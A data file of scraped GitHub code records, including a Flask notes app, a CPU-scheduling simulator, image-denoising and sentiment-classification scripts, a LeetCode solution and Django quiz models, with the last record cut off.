+{"seq_id":"35167141933","text":"from flask import Flask, redirect, render_template, request\nfrom flask_heroku import Heroku\nfrom flask_sqlalchemy import SQLAlchemy\nimport datetime as dt\nimport logging\n\n# Initialize Heroku app and database connection\nlogging.basicConfig(level=logging.DEBUG)\n\napp = Flask(__name__)\nheroku = Heroku(app)\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False # Suppress warning\ndb = SQLAlchemy(app)\n\napp.debug = True\n\n\n# SQLAlchemy Database entities\n# (each class corresponds to a database table and each instance to a table row)\nclass Note(db.Model):\n    '''ORM mapping of the Note entity'''\n\n    # Each attribute is a table column\n    # These attributes are created automatically\n    id = db.Column(db.Integer, primary_key=True)\n    created_at = db.Column(db.DateTime, default=db.func.now(), nullable=False)\n    modified_at = db.Column(db.DateTime, default=db.func.now(), nullable=False)\n\n    # These attributes should be set manually (default: None)\n    title = db.Column(db.String)\n    content = db.Column(db.String)\n\n\nclass NoteVersion(db.Model):\n    '''ORM mapping of the NoteVersion entity (has to be created manually)'''\n    # These attributes are created automatically\n    id = db.Column(db.Integer, primary_key=True)\n    created_at = db.Column(db.DateTime, default=db.func.now(), nullable=False)\n    modified_at = db.Column(db.DateTime, default=db.func.now(), nullable=False)\n\n    # These attributes should be set manually (default: None)\n    note_id = db.Column(db.Integer, db.ForeignKey(Note.id))\n    title = db.Column(db.String)\n    content = db.Column(db.String)\n\n    # Create a relationship to the parent Note\n    note = db.relationship(Note, backref=db.backref('versions', lazy='dynamic'))\n\n\n# Flask URL handlers\n@app.route('/')\ndef index():\n    '''Index page'''\n\n    # Query all instances of Note from database\n    notes = Note.query.all()\n\n    # Render index page listing all notes\n    return render_template('index.html', notes=notes)\n\n\n@app.route('/note/new')\ndef note_new():\n    '''Create a new note'''\n\n    # Create a new instance from Note and add it to database\n    note = Note()\n    db.session.add(note)\n    
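# commit right away so the database assigns the note id used in the redirect below\n    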
db.session.commit()\n\n    # Redirect user to newly created note\n    return redirect('/note/%d' % note.id)\n\n\n@app.route('/note/<int:note_id>', methods=['GET', 'POST'])\ndef note(note_id):\n    '''Open/update an existing note'''\n\n    # Retrieve an existing instance from Note by id\n    note = Note.query.get_or_404(note_id)\n\n    if request.method == 'POST':\n        # Save previous version\n        version = NoteVersion()\n        version.note_id = note.id\n        version.title = note.title\n        version.content = note.content\n\n        # If responding to a POST, update fields from HTML form (if present)\n        note.title = request.form.get('title', note.title)\n        note.content = request.form.get('content', note.content)\n        note.modified_at = dt.datetime.now()\n\n        # And commit instance changes to database\n        db.session.add(version)\n        db.session.add(note)\n        db.session.commit()\n\n    # Render note page containing an HTML form with instance contents\n    return render_template('note.html', note=note)\n\n\n@app.route('/note/<int:note_id>/versions')\ndef note_versions(note_id):\n    '''List previous versions of a note'''\n\n    # Retrieve an existing instance from Note by id\n    note = Note.query.get_or_404(note_id)\n\n    # Render page with a note object containing the versions\n    return render_template('note_versions.html', note=note)\n\n\n@app.route('/version/<int:version_id>')\ndef note_version(version_id):\n    '''Show an existing note version'''\n\n    # Retrieve an existing instance from NoteVersion by id\n    version = NoteVersion.query.get_or_404(version_id)\n\n    # Render page with a note object containing the versions\n    return render_template('note_version.html', version=version)\n\n\n# Run app from command-line\nif __name__ == '__main__':\n    app.run()\n","repo_name":"divieira/asciimath-notebook","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"9041509493","text":"import time\nimport cv2\n\nfrom numpy import array, mean, std\n\nfrom visp.detector import QRCodeDetector\n\nres = 640, 480\n\nif __name__ == '__main__':\n    cap = cv2.VideoCapture(0)\n\n    cap.set(cv2.CAP_PROP_FRAME_WIDTH, res[0])\n    cap.set(cv2.CAP_PROP_FRAME_HEIGHT, res[1])\n\n    qr_code_detector = QRCodeDetector()\n\n    dt = []\n\n    while True:\n        success, img = cap.read()\n\n        start = time.time()\n        qr_codes = qr_code_detector.detect(img)\n        end = time.time()\n\n        for code in qr_codes:\n            code.draw(img)\n\n        dt.append(end - start)\n        if len(dt) == 20:\n            dt = array(dt) * 1000\n            print('Average detection time {}ms (STD={})'.format(mean(dt), std(dt)))\n            dt = []\n\n        cv2.imshow('Live Video', img)\n        cv2.waitKey(20)\n","repo_name":"pierre-rouanet/pyvisp","sub_path":"tests/qrcode_detection.py","file_name":"qrcode_detection.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"18500289297","text":"# Import necessary modules\nimport sys\nfrom PySide2.QtGui import *\nfrom PySide2.QtCore import *\nfrom PySide2.QtWidgets import *\n\nclass AnalogClock(QWidget):\n    hourHand = QPolygon([\n        QPoint(7, 8),\n        QPoint(-7, 8),\n        QPoint(0, -40)\n    ])\n\n    minuteHand = QPolygon([\n        QPoint(7, 8),\n        QPoint(-7, 8),\n        QPoint(0, -70)\n    ])\n\n    hourColor = QColor(255, 0, 127)\n    minuteColor = QColor(0, 127, 127, 255)\n\n    def __init__(self, parent=None):\n        QWidget.__init__(self)\n\n        timer = QTimer(self)\n        timer.timeout.connect(self.update)\n        timer.start(1000)\n\n        self.setWindowTitle("Analog Clock")\n        self.resize(200, 200)\n\n    def paintEvent(self, event):\n        
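# all drawing happens in a 200x200 logical coordinate system that is scaled to the widget size\n        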
side = min(self.width(), self.height())\n        time = QTime.currentTime()\n\n        painter = QPainter(self)\n        painter.setRenderHint(QPainter.Antialiasing)\n        painter.translate(self.width() / 2, self.height() / 2)\n        painter.scale(side / 200.0, side / 200.0)\n\n        painter.setPen(Qt.NoPen)\n        painter.setBrush(AnalogClock.hourColor)\n\n        painter.save()\n        painter.rotate(30.0 * ((time.hour() + time.minute() / 60.0)))\n        painter.drawConvexPolygon(AnalogClock.hourHand)\n        painter.restore()\n\n        painter.setPen(AnalogClock.hourColor)\n\n        for i in range(12):\n            painter.drawLine(88, 0, 96, 0)\n            painter.rotate(30.0)\n\n        painter.setPen(Qt.NoPen)\n        painter.setBrush(AnalogClock.minuteColor)\n\n        painter.save()\n        painter.rotate(6.0 * (time.minute() + time.second() / 60.0))\n        painter.drawConvexPolygon(AnalogClock.minuteHand)\n        painter.restore()\n\n        painter.setPen(AnalogClock.minuteColor)\n\n        for j in range(60):\n            if (j % 5) != 0:\n                painter.drawLine(92, 0, 96, 0)\n            painter.rotate(6.0)\n\nif __name__ =='__main__':\n    # Exception Handling\n    try:\n        myApp = QApplication(sys.argv)\n        myClock = AnalogClock()\n        myClock.show()\n        myApp.exec_()\n        sys.exit(0)\n    except NameError:\n        print("Name Error:", sys.exc_info()[1])\n    except SystemExit:\n        print("Closing Window...")\n    except Exception:\n        print(sys.exc_info()[1])\n","repo_name":"j2doll/Learning-Qt-for-Python","sub_path":"PSGUIAD/5/Ch5_6.py","file_name":"Ch5_6.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"}
+{"seq_id":"24100481938","text":"import os\nimport pickle\n\ndic={}\nf=open('project1_result2.txt')\nfor root, dirs, files in os.walk('NYT'):\n    for fname in files:\n        content=f.readline()\n        print(fname, content)\n        dic[fname]=content\n\nf.close()\n\n\nwith open("transformer.pickle","wb") as fw:\n    pickle.dump(dic, fw)\n","repo_name":"saga9017/laboratory","sub_path":"project1/sample3.py","file_name":"sample3.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"}
+{"seq_id":"10515774757","text":"# /*\r\n# ALGOS\r\n# 1. First-Come First-Served (FCFS) - non-preemptive\r\n#   -the ready queue will update as processes come in and out based on FCFS\r\n# 2. Shortest Remaining Time First (SRTF) - preemptive\r\n#   -the ready queue updates dynamically as processes come in, preserving\r\n#   -the SRTF priority\r\n# 3. Highest Response Ratio Next (HRRN) - non-preemptive\r\n#   -\r\n# 4. 
Round Robin, with different quantum values (RR)\r\n#\r\n# METRICS\r\n# for each lambda value\r\n# The average turnaround time\r\n# The total throughput (number of processes done per unit time)\r\n# The CPU utilization\r\n# The average number of processes in the ready queue\r\n# single plot for each method based on\r\n# */\r\nimport random\r\nimport math\r\nfrom sys import argv\r\nfrom Event import Event\r\nfrom operator import attrgetter\r\nimport matplotlib.pyplot as plt\r\n\r\ndef genexp(l):\r\n x = 0\r\n while(x==0):\r\n u = random.random()\r\n x = (-1/l)*math.log(u)\r\n return(x)\r\n\r\ndef departIndex(list):\r\n for i in range(len(list)):\r\n if (list[i].getType == 2):\r\n return i\r\n\r\n\r\nclass Sim():\r\n def __init__(self, algo, lam, qv):\r\n self.events = []\r\n self.rq = []\r\n self.clock = 0.0\r\n self.algorithm = algo\r\n self.lam = 10.0 + lam\r\n self.avgST = .04\r\n self.qv = qv\r\n self.cpuIdle = 1 #1 = true, 0 = false\r\n self.endCondition = 0\r\n self.arrivalTime = []\r\n self.processTime = []\r\n self.pID = 0\r\n self.turnaroundTimes = []\r\n self.cpuUseTime = 0.0\r\n self.startUse = 0.0\r\n self.stopUse = 0.0\r\n self.totalQue = 0\r\n\r\n\r\n def init(self):\r\n previousEventTime = 0\r\n for i in range(10000):\r\n self.arrivalTime.append((genexp(self.lam)) + previousEventTime)\r\n previousEventTime = self.arrivalTime[i]\r\n self.processTime.append(genexp(1/self.avgST))\r\n self.events.append(Event(0, self.processTime[0], 1, 0))\r\n\r\n def scheduleEvent(self,type,eve):\r\n if (type == 1):\r\n self.events.append(eve)\r\n elif (type == 2):\r\n eve.setRequestTime(self.clock+eve.getTimeRemaining())\r\n eve.setType(2)\r\n self.events.append(eve)\r\n elif (type == 3):\r\n eve.setRequestTime(self.clock+self.qv)\r\n eve.setTimeRemaining(eve.getTimeRemaining()-self.qv)\r\n eve.setType(3)\r\n self.events.append(eve)\r\n #time slice event\r\n\r\n def arrival(self,event):\r\n if (self.algorithm == 1):\r\n if (self.cpuIdle == 1):\r\n self.cpuIdle = 0\r\n self.startUse = self.clock\r\n print(\"cpu starting, event: \" + str(event.getID()) + \" add to depart\")\r\n self.scheduleEvent(2,event)\r\n else:\r\n print(\"cpu in use, added event: \" + str(event.getID()) + \" to ready que\")\r\n self.rq.append(event)\r\n self.totalQue = 1 + self.totalQue\r\n elif (self.algorithm == 2):\r\n if (self.cpuIdle == 1):\r\n self.cpuIdle = 0\r\n self.startUse = self.clock\r\n ##print(\"cpu starting, event add to depart\")\r\n self.scheduleEvent(2,event)\r\n else:\r\n ##print(\"An interupt has occured\")\r\n index = departIndex(self.events)\r\n self.events[index].setTimeRemaining(self.events[index].getTimeRemaining()-self.clock)\r\n for i in range(len(self.events)):\r\n temp = self.events[i]\r\n self.rq.append(temp)\r\n self.events.pop(index)\r\n self.rq = self.rq = sorted(self.rq,key=attrgetter('timeRemaining'))\r\n temp = self.rq[0]\r\n self.scheduleEvent(2,temp)\r\n self.rq.pop(0)\r\n self.totalQue = 1 + self.totalQue\r\n elif (self.algorithm == 3):\r\n if (self.cpuIdle == 1):\r\n self.cpuIdle = 0\r\n self.startUse = self.clock\r\n #print(\"cpu starting, event add to depart\")\r\n self.scheduleEvent(2,event)\r\n else:\r\n #print(\"cpu running, new event added to rq\")\r\n self.totalQue = 1 + self.totalQue\r\n self.rq.append(event)\r\n elif (self.algorithm == 4):\r\n if (self.cpuIdle == 1):\r\n self.cpuIdle == 0\r\n self.startUse = self.clock\r\n if(event.getTimeRemaining() < self.qv):\r\n ##print(\"cpu starting, event add to depart\")\r\n self.scheduleEvent(2,event)\r\n else:\r\n ##print(\"cpu 
starting, event add to ts\")\r\n self.scheduleEvent(3,event)\r\n else:\r\n ##print(\"cpu running, new event added to rq\")\r\n self.totalQue = 1 + self.totalQue\r\n self.rq.append(event)\r\n\r\n def depart(self):\r\n if (self.algorithm == 1):\r\n if (len(self.rq)==0):\r\n self.cpuIdle = 1\r\n self.stopUse = self.clock\r\n self.cpuUseTime = (self.stopUse - self.startUse) + self.cpuUseTime\r\n print(\"cpu idle, nothing in rq\")\r\n else:\r\n print(\"cpu in use, depart occuring, scheduled: \"+ str(self.rq[0].getID()) +\" as next depart\")\r\n temp = self.rq[0]\r\n self.scheduleEvent(2,temp)\r\n self.rq.pop(0)\r\n elif (self.algorithm == 2):\r\n #for a depart if there is stuff in ready que then\r\n #sort by shortest time remaining\r\n if (len(self.rq) == 0):\r\n self.cpuIdle = 1\r\n self.stopUse = clock\r\n self.cpuUseTime = (self.stopUse - self.startUse) + self.cpuUseTime\r\n #print(\"cpu idle, nothing in rq\")\r\n else:\r\n #print(\"new process, cpu still running, scheduled process depart\")\r\n self.rq = sorted(self.rq,key=attrgetter('timeRemaining'))\r\n temp = self.rq[0]\r\n self.scheduleEvent(2,temp)\r\n self.rq.pop(0)\r\n self.totalQue = 1 + self.totalQue\r\n elif (self.algorithm == 3):\r\n if (len(self.rq) == 0):\r\n self.cpuIdle = 1\r\n self.stopUse = clock\r\n self.cpuUseTime = (self.stopUse - self.startUse) + self.cpuUseTime\r\n #print(\"cpu idle, nothing in rq\")\r\n else:\r\n #print(\"process from rq, cpu still running, scheduled depart\")\r\n for i in range(len(self.rq)):\r\n self.rq[i].setWT(self.rq[i].getRequestTime() - self.clock)\r\n self.rq[i].setRR((self.rq[i].getWaitTime() + self.rq[i].getTimeRemaining())/self.rq[i].getTimeRemaining())\r\n self.rq = sorted(self.rq,key=attrgetter('responseRatio'),reverse=True)\r\n self.scheduleEvent(2,self.rq[0])\r\n self.rq.pop(0)\r\n self.totalQue = 1 + self.totalQue\r\n elif (self.algorithm == 4):\r\n if (len(self.rq) == 0):\r\n self.cpuIdle = 1\r\n self.stopUse = clock\r\n self.cpuUseTime = (self.stopUse - self.startUse) + self.cpuUseTime\r\n ##print(\"cpu idle, nothing in rq\")\r\n else:\r\n ##print(\"process from rq, cpu still running, scheduled depart\")\r\n self.rq[0].setRequestTime(clock)\r\n event = self.rq[0]\r\n self.totalQue = 1 + self.totalQue\r\n if(self.rq.getTimeRemaining() < self.qv):\r\n ##print(\"cpu running, rq event add to depart\")\r\n self.scheduleEvent(2,event)\r\n self.rq.pop(0)\r\n else:\r\n ##print(\"cpu running, rq event add to ts\")\r\n self.scheduleEvent(3,event)\r\n self.rq.pop(0)\r\n\r\n def timeSlice(self, event):\r\n if (len(self.rq)==0):\r\n if(event.getTimeRemaining() < self.qv):\r\n ##print(\"cpu running, ts add to depart\")\r\n self.scheduleEvent(2,event)\r\n else:\r\n ##print(\"cpu running, ts add to ts\")\r\n self.scheduleEvent(3,event)\r\n else:\r\n if(self.rq[0].getRequestTime() < self.clock):\r\n if(self.rq[0].getTimeRemaining() < self.qv):\r\n #print(\"cpu running, rq add to depart\")\r\n self.rq[0].setRequestTime(self.clock)\r\n self.scheduleEvent(2,self.rq)\r\n else:\r\n #print(\"cpu running, rq add to ts\")\r\n self.rq[0].setRequestTime(self.clock)\r\n self.scheduleEvent(3,self.rq)\r\n self.totalQue = 1 + self.totalQue\r\n self.rq.append(event)\r\n self.rq.pop(0)\r\n else:\r\n if(event.getTimeRemaining() < self.qv):\r\n #print(\"cpu running, ts add to depart\")\r\n self.scheduleEvent(2,event)\r\n else:\r\n #print(\"cpu running, ts add to ts\")\r\n self.scheduleEvent(3,event)\r\n\r\n def runSim(self):\r\n while(self.endCondition != 10000):\r\n eve = self.events[0]\r\n #print(\"Event to process: 
\" + str(eve.getID()))\r\n self.clock = eve.getRequestTime()\r\n\r\n if (eve.getType() == 1):\r\n self.arrival(eve)\r\n elif(eve.getType() == 2):\r\n self.turnaroundTimes.append(eve.getTurnAroundTime())\r\n self.depart()\r\n self.endCondition = self.endCondition + 1\r\n #print(\"Processes completed: \" + str(self.endCondition))\r\n elif(eve.getType() == 3):\r\n self.timeSlice(eve)\r\n\r\n self.events.pop(0)\r\n if (self.pID != 9999):\r\n self.pID = self.pID + 1\r\n nextEve = Event((self.arrivalTime[self.pID]), self.processTime[self.pID],1,self.pID)\r\n self.scheduleEvent(1,nextEve)\r\n\r\n self.events = sorted(self.events,key=attrgetter('requestTime'))\r\n\r\n def metrics(self, turnList, throughList, cpuList, queList):\r\n turnList.append(sum(self.turnaroundTimes)/10000)\r\n throughList.append(10000/self.clock)\r\n cpuList.append((self.cpuUseTime/self.clock)*100)\r\n queList.append(self.totalQue/self.clock)\r\n\r\n################################################################################\r\n\r\n\r\nturnTimes = []\r\nthroughTimes = []\r\ncpuUtilTimes = []\r\navgQueTimes = []\r\nlamValues = []\r\n#FCFS\r\nfor i in range (21):\r\n print(\"FCFS\" + str(i))\r\n lamValues.append(10+i)\r\n sim = Sim(1,i,.01)\r\n sim.init()\r\n sim.runSim()\r\n sim.metrics(turnTimes,throughTimes,cpuUtilTimes,avgQueTimes)\r\n\r\nplt.plot(lamValues, turnTimes, label = \"Turn Around Average\")\r\nplt.plot(lamValues, throughTimes, label = \"Through Put (Processes Per Second)\")\r\nplt.plot(lamValues, cpuUtilTimes, label = \"CPU Util %\")\r\nplt.plot(lamValues, avgQueTimes, label = \"Average Que Size\")\r\n\r\nplt.xlabel('Lambda Values')\r\nplt.ylabel('FCFS Values')\r\n\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n#need to print graphs to file after interation\r\n\r\nturnTimes = []\r\nthroughTimes = []\r\ncpuUtilTimes = []\r\navgQueTimes = []\r\nlamValues = []\r\n#SRTF\r\nfor i in range (21):\r\n print(\"SRTF\" + str(i))\r\n lamValues.append(10+i)\r\n sim = Sim(1,i,.01)\r\n sim.init()\r\n sim.runSim()\r\n sim.metrics(turnTimes,throughTimes,cpuUtilTimes,avgQueTimes)\r\n\r\nplt.plot(lamValues, turnTimes, label = \"Turn Around Average\")\r\nplt.plot(lamValues, throughTimes, label = \"Through Put (Processes Per Second)\")\r\nplt.plot(lamValues, cpuUtilTimes, label = \"CPU Util %\")\r\nplt.plot(lamValues, avgQueTimes, label = \"Average Que Size\")\r\n\r\nplt.xlabel('Lambda Values')\r\nplt.ylabel('SRTF Values')\r\n\r\nplt.legend()\r\nplt.show()\r\n\r\nturnTimes = []\r\nthroughTimes = []\r\ncpuUtilTimes = []\r\navgQueTimes = []\r\nlamValues = []\r\n#HRRN\r\nfor i in range (21):\r\n print(\"HRRN\" + str(i))\r\n lamValues.append(10+i)\r\n sim = Sim(1,i,.01)\r\n sim.init()\r\n sim.runSim()\r\n sim.metrics(turnTimes,throughTimes,cpuUtilTimes,avgQueTimes)\r\n\r\nplt.plot(lamValues, turnTimes, label = \"Turn Around Average\")\r\nplt.plot(lamValues, throughTimes, label = \"Through Put (Processes Per Second)\")\r\nplt.plot(lamValues, cpuUtilTimes, label = \"CPU Util %\")\r\nplt.plot(lamValues, avgQueTimes, label = \"Average Que Size\")\r\n\r\nplt.xlabel('Lambda Values')\r\nplt.ylabel('HRRN Values')\r\n\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\nturnTimes = []\r\nthroughTimes = []\r\ncpuUtilTimes = []\r\navgQueTimes = []\r\nlamValues = []\r\n#RR - .01 qv\r\nfor i in range (21):\r\n print(\"RR - .01 \" + str(i))\r\n lamValues.append(10+i)\r\n sim = Sim(1,i,.01)\r\n sim.init()\r\n sim.runSim()\r\n sim.metrics(turnTimes,throughTimes,cpuUtilTimes,avgQueTimes)\r\n\r\nplt.plot(lamValues, turnTimes, label = \"Turn Around 
Average\")\r\nplt.plot(lamValues, throughTimes, label = \"Through Put (Processes Per Second)\")\r\nplt.plot(lamValues, cpuUtilTimes, label = \"CPU Util %\")\r\nplt.plot(lamValues, avgQueTimes, label = \"Average Que Size\")\r\n\r\nplt.xlabel('Lambda Values')\r\nplt.ylabel('RR - .01 Values')\r\n\r\nplt.legend()\r\nplt.show()\r\n\r\nturnTimes = []\r\nthroughTimes = []\r\ncpuUtilTimes = []\r\navgQueTimes = []\r\nlamValues = []\r\n#RR - .2\r\nfor i in range (21):\r\n print(\"RR - .2 \" + str(i))\r\n lamValues.append(10+i)\r\n sim = Sim(1,i,.2)\r\n sim.init()\r\n sim.runSim()\r\n sim.metrics(turnTimes,throughTimes,cpuUtilTimes,avgQueTimes)\r\n\r\nplt.plot(lamValues, turnTimes, label = \"Turn Around Average\")\r\nplt.plot(lamValues, throughTimes, label = \"Through Put (Processes Per Second)\")\r\nplt.plot(lamValues, cpuUtilTimes, label = \"CPU Util %\")\r\nplt.plot(lamValues, avgQueTimes, label = \"Average Que Size\")\r\n\r\nplt.xlabel('Lambda Values')\r\nplt.ylabel('RR - .2 Values')\r\n\r\nplt.legend()\r\nplt.show()\r\n","repo_name":"PhilipCesani/Operating_Systems_Schedule_Simulator","sub_path":"sim.py","file_name":"sim.py","file_ext":"py","file_size_in_byte":13909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"71820750397","text":"import numpy as np\nimport matplotlib.pylab as plt\nfrom scipy.ndimage import gaussian_filter\nfrom skimage.transform import resize\nfrom scipy import ndimage\nimport imageio\n\ndef psnr(clean, img):\n img = img\n clean = clean\n mse = np.mean((clean-img)**2)\n if mse == 0:\n return 100\n PIXEL_MAX = 1\n return 20 * np.log10(PIXEL_MAX/np.sqrt(mse))\n\n\ninput_path = 'C:/Files/M2 MVA/S1/Object recognition/Project/SinGAN-master/Input/Set14/'\nnoisy_path = 'C:/Files/M2 MVA/S1/Object recognition/Project/SinGAN-master/Input/GaussianNoise/'\noutput_path = 'C:/Files/M2 MVA/S1/Object recognition/Project/SinGAN-master/Output/Paint2image/'\nfiltered_path = 'C:/Files/M2 MVA/S1/Object recognition/Project/SinGAN-master/Input/Filtered/'\nNLmeans_path = 'C:/Files/M2 MVA/S1/Object recognition/Project/SinGAN-master/Input/NLmeans/Gaussian/'\n\n\n#### Clean image\nimage = imageio.imread(input_path+\"bridge.png\")/255\nplt.imshow(image)\nplt.show()\n\n#### Noisy image\nnoisy = imageio.imread(noisy_path+'sigma=30-bridge.png')/255\nnoisy = resize(noisy, image.shape, mode='reflect')\nplt.imshow(noisy)\nplt.show()\nprint(\"Noisy image PSNR\", psnr(image, noisy))\n\n\n#### SinGAN result\n#output = imageio.imread(output_path+'NL-sigma=30-lenna/sigma=30-lenna_out/start_scale=7.png')/255\noutput = imageio.imread(output_path+'f-sigma=30-bridge/start_scale=8.png')/255\noutput = resize(output, image.shape, mode='reflect')\nplt.imshow(output)\nplt.show()\nprint(\"sinGAN Denoised image PSNR\", psnr(image, output))\n\n\n### Median filter\nfiltered = imageio.imread(filtered_path+\"f-sigma=30-bridge.png\")/255\nfiltered = resize(filtered, image.shape, mode='reflect')\nprint(\"Median-Filter denoised image PSNR\", psnr(image, filtered))\nplt.imshow(filtered)\nplt.show()\n\n\n#### NLmeans\nNLmeans_denoised = imageio.imread(NLmeans_path+\"NL-sigma=30-barbara.png\")/255\nNLmeans_denoised = resize(NLmeans_denoised, image.shape, mode='reflect')\nprint(\"NLmeans denoised image PSNR\", psnr(image, 
NLmeans_denoised))\nplt.imshow(NLmeans_denoised)\nplt.show()\n","repo_name":"Amrou7/Sin-GAN-master","sub_path":"PSRN.py","file_name":"PSRN.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"21752265271","text":"class Solution:\n def isInterleave_recur(self, s1, s2, s3):\n \"\"\"\n :type s1: str\n :type s2: str\n :type s3: str\n :rtype: bool\n \"\"\"\n len1 = len(s1)\n len2 = len(s2)\n len3 = len(s3)\n if len1==0 and len2==0 and len3==0:\n return True\n\n\n if len1>0 and len2>0 and s1[0] == s2[0]:\n if len3>0 and s1[0] == s3[0]:\n return self.isInterleave(s1[1:],s2,s3[1:]) or \\\n self.isInterleave(s1,s2[1:],s3[1:])\n else:\n return False\n else:\n if len1 >0 and len3>0 and s1[0] == s3[0]:\n return self.isInterleave(s1[1:],s2,s3[1:])\n elif len2>0 and len3>0 and s2[0] == s3[0]:\n return self.isInterleave(s1,s2[1:],s3[1:])\n else:\n return False\n\n\n def isInterleave(self, s1, s2, s3):\n \"\"\"\n :type s1: str\n :type s2: str\n :type s3: str\n :rtype: bool\n \"\"\"\n len1 = len(s1)\n len2 = len(s2)\n len3 = len(s3)\n\n dp = [[False for j in range(len2+1)] for i in range(len1+1)]\n if s3[0] == s1[0]:\n dp[1][0] = True\n if s3[0] == s2[0]:\n dp[0][1] = True\n\n for i3 in range(1, len3):\n for i1 in range(0,i3+1):\n if i1 <=len1 and i3-i1<= len2 and dp[i1][i3-i1]:\n print(i1, i3-i1)\n if i1 < len1 and s1[i1] == s3[i3]:\n dp[i1+1][i3-i1] = True\n if i3-i1 < len2 and s2[i3-i1] == s3[i3]:\n dp[i1][i3-i1+1] = True\n\n \n return dp[len1][len2]\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nsol = Solution()\n\ns1 = \"bbbbbabbbbabaababaaaabbababbaaabbabbaaabaaaaababbbababbbbbabbbbababbabaabababbbaabababababbbaaababaa\"\ns2 = \"babaaaabbababbbabbbbaabaabbaabbbbaabaaabaababaaaabaaabbaaabaaaabaabaabbbbbbbbbbbabaaabbababbabbabaab\"\ns3 = \"babbbabbbaaabbababbbbababaabbabaabaaabbbbabbbaaabbbaaaaabbbbaabbaaabababbaaaaaabababbababaababbababbbababbbbaaaabaabbabbaaaaabbabbaaaabbbaabaaabaababaababbaaabbbbbabbbbaabbabaabbbbabaaabbababbabbabbab\"\n\n\n# s1 = \"aabccc\"\n# s2 = \"dbbca\"\n# s3 =\"aadbbcbcacc\"\nprint(sol.isInterleave(s1,s2,s3))\n\n","repo_name":"guodafeng/pythondev","sub_path":"algorithm/leetcode/97.py","file_name":"97.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"33236117368","text":"from utils import tokenize, load_curpus\nimport numpy as np\nimport pandas as pd\nimport warnings\nimport time\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn import metrics\n\nwarnings.filterwarnings(\"ignore\")\n\n\nstart = time.clock()\n\nsentiment_vocab = ['agreeable', 'believable', 'good', 'hated', 'sad', 'worried', 'objective']\nfor the_emotion in sentiment_vocab: #循环训练7个情感\n train_data = load_curpus(\"data/\" + the_emotion + \"/train.txt\")\n test_data = load_curpus(\"data/\" + the_emotion + \"/test.txt\")\n # print(train_data)\n train_df = pd.DataFrame(train_data, columns=[\"content\", \"sentiment\"])\n# print(train_df)\n test_df = pd.DataFrame(test_data, columns=[\"content\", \"sentiment\"])\n\n stopwords = []\n with open(\"stopwords.txt\", \"r\", encoding=\"utf8\") as f:\n for w in f:\n stopwords.append(w.strip())\n\n data_str = [\" \".join(content) for content, sentiment in train_data] + \\\n [\" \".join(content) for content, sentiment in test_data]\n vectorizer = 
CountVectorizer(token_pattern='\\[?\\w+\\]?', stop_words=stopwords)\n vectorizer.fit_transform(data_str)\n\n X_data, y_data = [], []\n for content, sentiment in train_data:\n X, y = [], sentiment\n X_data.append(\" \".join(content))\n y_data.append(sentiment)\n X_train = vectorizer.transform(X_data)\n y_train = y_data\n\n X_data, y_data = [], []\n for content, sentiment in test_data:\n X, y = [], sentiment\n X_data.append(\" \".join(content))\n y_data.append(sentiment)\n X_test = vectorizer.transform(X_data)\n y_test = y_data\n\n\n\n clf = MultinomialNB()\n clf.fit(X_train, y_train)\n\n result = clf.predict(X_test)\n\n\n\n print(metrics.classification_report(y_test, result))\n print('训练', the_emotion)\n print(\"准确率:\", metrics.accuracy_score(y_test, result))\n\nelapsed = (time.clock() - start)\nprint(\"Time used:\",elapsed)\n\n\n\n","repo_name":"lyeXzot/News_emotion_classify","sub_path":"NN&LSTM&NB/NB.py","file_name":"NB.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"32460445056","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\n\n# from student.models import Student\n\n\nclass Test(models.Model):\n name_test = models.CharField(max_length=48)\n\n created = models.DateTimeField(auto_now_add=True, auto_now=False, null=True)\n updated = models.DateTimeField(auto_now_add=False, auto_now=True, null=True)\n\n def __str__(self):\n return \"%s\" % self.name_test\n\n class Meta:\n verbose_name = \"Тест\"\n verbose_name_plural = \"Тесты\"\n\n\nclass Question(models.Model):\n test = models.ForeignKey(Test, blank=True, null=True, default=None, on_delete=models.CASCADE)\n question_text = models.CharField(max_length=256)\n\n def __str__(self):\n return \"%s\" % self.question_text\n\n class Meta:\n verbose_name = \"Вопрос\"\n verbose_name_plural = \"Вопросы\"\n\n\nclass QuestImage(models.Model):\n quest = models.ForeignKey(Question, blank=True, null=True, default=None, on_delete=models.CASCADE)\n image = models.ImageField(upload_to='quest_images/', default=None)\n\n created = models.DateTimeField(auto_now_add=True, auto_now=False)\n updated = models.DateTimeField(auto_now_add=False, auto_now=True)\n\n def __str__(self):\n return \"%s\" % self.id\n\n class Meta:\n verbose_name = 'Картинка вопроса'\n verbose_name_plural = 'Картинки вопроса'\n\n\nclass Answer(models.Model):\n answer_text = models.CharField(max_length=256)\n image = models.ImageField(upload_to='answer_images/', default=None, null=True, blank=True)\n quest = models.ForeignKey(Question, blank=True, null=True, default=None, on_delete=models.CASCADE)\n status = models.BooleanField(null=False, blank=False, default=False)\n\n def __str__(self):\n return self.answer_text\n\n class Meta:\n verbose_name = \"Ответ\"\n verbose_name_plural = \"Ответы\"\n\n\nclass Result(models.Model):\n name = models.ForeignKey(User, 